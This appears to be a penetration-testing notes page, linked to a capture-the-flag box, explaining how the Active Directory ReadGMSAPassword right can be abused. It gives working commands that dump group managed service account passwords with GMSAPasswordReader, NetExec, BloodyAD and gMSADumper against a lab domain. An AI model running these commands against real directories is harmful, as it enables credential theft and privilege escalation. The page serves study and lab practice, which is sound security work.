# ReadGMSAPassword [Group Managed Service Accounts (gMSAs)](https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/group-managed-service-accounts/group-managed-service-accounts/group-managed-service-accounts-overview) are an Active Directory feature that provides a secure and automated way to manage service accounts used by applications and services on Windows systems. Unlike traditional service accounts, gMSAs automatically generate, store, and rotate strong passwords, **eliminating the need for manual password management**. A gMSA can be associated with a group of authorized hosts, allowing multiple servers or services to use the same account. The domain controller handles password generation and distribution through a secure process, ensuring that only approved systems can retrieve the current password. Access to use a gMSA is controlled through permissions stored in the `msDS-GroupMSAMembership` attribute, which contains a DACL defining which principals, such as computer accounts or services, are allowed to retrieve the password. If an attacker gains control of a principal that has these rights, they may be able to abuse this access to obtain the gMSA password and potentially escalate privileges. ## Windows The GMSA password can be read with [GMSAPasswordReader](https://github.com/rvazarkar/GMSAPasswordReader). {% code overflow="wrap" %} ```powershell .\GMSAPasswordReader.exe --accountname delegator$ ``` {% endcode %} ## Linux The GMSA password can be read from a Linux host using [NetExec](https://github.com/Pennyw0rth/NetExec), [BloodyAD](https://github.com/CravateRouge/bloodyAD), or [gMSADumper](https://github.com/micahvandeusen/gMSADumper). {% code overflow="wrap" %} ```bash # NetExec nxc ldap dc01.marvel.local -u x7331 -p 'Passw0rd123!' -k --gmsa # BloodyAD bloodyAD -d marvel.local -u x7331 -p 'Passw0rd123!' --host dc01.marvel.local get object 'delegator$' --attr msDS-ManagedPassword # gMSADumper python3 gMSADumper.py -d marvel.local -l 10.10.10.81 -u x7331 -p 'Passw0rd123!' ``` {% endcode %} For an example using NetExec, see [Rebound](https://x7331.gitbook.io/boxes/boxes/insane/rebound#gmsa).